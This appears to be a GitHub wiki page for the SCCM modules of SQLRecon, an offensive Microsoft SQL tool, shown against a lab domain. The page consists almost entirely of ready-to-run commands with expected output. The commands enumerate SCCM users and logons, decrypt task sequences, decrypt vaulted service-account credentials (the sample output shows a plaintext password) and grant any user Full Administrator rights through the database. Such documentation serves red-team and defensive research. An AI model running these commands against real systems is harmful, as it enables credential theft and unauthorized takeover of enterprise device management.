-
Notifications
You must be signed in to change notification settings - Fork 114
7. SCCM Modules
SCCM modules are effective when you are able to interact with an SCCM server that has exposes the Microsoft SQL database, either locally or remotely.
SCCM modules support impersonation, with the exception of DecryptCredentials. An example has been provided in the "Users" section below.
SQLRecon.exe /auth:WinToken /i:sa /host:MECM01 /database:CM_KAW /module:users
Expected output:
[*] High-Level SCCM User Listing:
| LogonName | AdminID | SourceSite | DistinguishedName |
| --------------------- | -------- | ---------- | --------------------------------------------- |
| KAWALABS\mssccm_svc | 16777217 | KAW | |
| KAWALABS\SCCM Support | 16777218 | KAW | CN=SCCM Support,CN=Users,DC=kawalabs,DC=local |
| KAWALABS\JSmith | 16777229 | KAW | |
| KAWALABS\ACon | 16777230 | KAW | |
[*] Detailed Permissions:
| LogonName | RoleName |
| --------------------- | ----------------------- |
| KAWALABS\mssccm_svc | Full Administrator |
| KAWALABS\SCCM Support | Read-only Analyst |
| KAWALABS\SCCM Support | Remote Tools Operator |
| KAWALABS\SCCM Support | Software Update Manager |
| KAWALABS\JSmith | Full Administrator |
| KAWALABS\ACon | Full Administrator |
SQLRecon.exe /auth:WinToken /host:MECM01 /database:CM_KAW /module:sites
Expected output:
| ServerName | SiteCode | AccessType | ADSiteName | IPSubnets | IsProtected | IPv6Prefixes | ServerRemoteName | IsDP | IsSMP |
| --------------------- | -------- | ---------- | ----------------------- | ----------- | ----------- | ------------ | --------------------- | ---- | ----- |
| MECM01.KAWALABS.LOCAL | KAW | 0 | Default-First-Site-Name | 172.16.10.0 | 0 | | MECM01.kawalabs.local | True | False |
SQLRecon.exe /auth:WinToken /host:MECM01 /database:CM_KAW /module:logons
Expected output:
| IP_Addr | Host | User |
-----------------------
| 172.16.10.110 | DESKTOP-LF8Q3C6 | KAWALABS\jsmith |
| 172.16.10.103 | MECM01 | KAWALABS\jsmith |
| 172.16.10.102 | SQL02| KAWALABS\admin |
SQLRecon.exe /auth:WinToken /host:MECM01 /database:CM_KAW /module:tasklist
Expected output:
| PkgID | Name |
| -------- | ------------------------ |
| KAW00005 | Install CrowdStrike |
| KAW00006 | Install Cisco Anyconnect |
| KAW00007 | Install MFA Soft Token |
SQLRecon.exe /auth:WinToken /host:MECM01 /database:CM_KAW /module:taskdata
Expected output:
[*] Gathered encrypted task sequence blob.
|-> Task Sequence ID: KAW00005
|-> Task Sequence Name: Install CrowdStrike
|-> Attempting to decrypt task data:
<sequence version="3.10"/>
[*] Gathered encrypted task sequence blob.
|-> Task Sequence ID: KAW00006
|-> Task Sequence Name: Install Cisco Anyconnect
|-> Attempting to decrypt task data:
<sequence version="3.10"/>
[*] Gathered encrypted task sequence blob.
|-> Task Sequence ID: KAW00007
|-> Task Sequence Name: Install MFA Soft Token
|-> Attempting to decrypt task data:
<sequence version="3.10"/>
SQLRecon.exe /auth:WinToken /host:MECM01 /database:CM_KAW /module:credentials
Expected output:
| UserName | Usage |
| ------------------- | ------------------------------------------------------------------------------- |
| KAWALABS\mssccm_svc | <AccountUsages><UsageName>SMS_CLIENT_CONFIG_MANAGER</UsageName></AccountUsages> |
SQLRecon.exe /auth:WinToken /host:MECM01 /database:CM_KAW /module:decryptcredentials
Expected output:
[*] Identified vaulted SCCM credential:
|-> Username: KAWALABS\mssccm_svc
|-> Password: Password123
|-> Function: SMS_CLIENT_CONFIG_MANAGER
SQLRecon.exe /auth:WinDomain /d: KAWALABS /u:admin /p:Password123 /host:MECM01 /database:CM_KAW /module:addadmin /user:current /sid:current
Expected output:
[+] SUCCESS: Added target user to RBAC_Admins table.
[*] Use the this command to remove the account: "/database:cm_kaw /module:sRemoveAdmin /user:16777223 /remove:00000000|00000000"
[+] SUCCESS: Assigned permissions to 'KAWALABS\JSmith'. The user should now be a 'Full Administrator' in SCCM.
SQLRecon.exe /auth:WinToken /host:MECM01 /database:CM_KAW /module:addadmin /user:KAWALABS\acon /sid:S-1-5-21-3113994310-608060616-2731373765-1391
Expected output:
SUCCESS: Added target user to RBAC_Admins table.
[*] Use the this command to remove the account: "/database:cm_kaw /module:sRemoveAdmin /user:16777224 /remove:00000000|00000000"
[+] SUCCESS: Asigned permissions to 'KAWALABS\acon'. The user should now be a 'Full Administrator' in SCCM.
SQLRecon.exe /a:windomain /d:kawalabs /u:admin /p:Password123 /database:CM_KAW /m:RemoveAdmin /user:16777224 /remove:"00000000|00000000"
Expected output:
[+] SUCCESS: Removed privileges from 16777224.
[+] SUCCESS: Removed user with AdminID of '16777224' from the 'RBAC_Admins' table.
[+] SUCCESS: All cleanup actions completed.